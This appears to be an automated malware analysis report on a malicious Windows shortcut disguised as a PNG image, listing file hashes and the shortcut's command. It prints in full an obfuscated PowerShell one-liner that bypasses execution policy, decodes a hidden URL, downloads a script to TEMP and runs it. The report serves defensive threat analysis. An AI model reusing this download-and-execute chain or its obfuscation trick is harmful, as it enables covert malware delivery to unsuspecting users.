Infection Chain
Summary by MalvaGPT
Characteristics
Hash: Hash Value
MD5: c1bc476409fcd391a809e11113fda140
Sha1: 968dfdfe02e1b20d4f86ef147f597ffaf49ce115
Sha256: 2bcf9244e88fbc1524df7c3261af70262af58a1bf2a8d1df50a8dce63f0a31be
Sha384: 71092f1642d9e8eb49451909f0312834276915e53b0b4032b49db621873e2e7328b2bff22c6a66390bcd4c064ad5486c
Sha512: 45b592a00e753baf3b4e9c3866f29b3b59ad288a0bfa8282b80810dbe5b95c95468fd9dead19c1e34c418ff30699446ad3ccd9b9f4104ec776895fcce04175d3
SSDeep: 384:zG9uWcwITsRxD7USm0oDwnJeN9MUF66zi29h1peG72CSVhQpDmQVp:IITuxPmXEJQ9MUF66x1pLyhpQVp
TLSH: FC62C0BF61062111C90B0E2C60E9EB298CFC74AF77BDD855E24541ED1ABF8AF070584D
Artefacts
Name: LNK: Command Execution
Value:

powershell.exe -ep bypass -c "$c=[bigint]\"3645341573120305356403486351237255\";$j=[bigint]\"1385878664031123131040806105037599\";$e=$c - $j;while($e -ne 0){$g+=[char]([int]($e -band 0xFF));$e=$e -shr 8};iwr $g -OutFile $env:TEMP\0MdBi7.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\0MdBi7.ps1"

c1bc476409fcd391a809e11113fda140 (15.75 KB)
No malware configuration was found at this point.
Artefacts
Name: LNK: Command Execution
Value: same command as in the Artefacts entry above
Malicious
Location: c1bc476409fcd391a809e11113fda140 > IMG-271500734.png.lnk
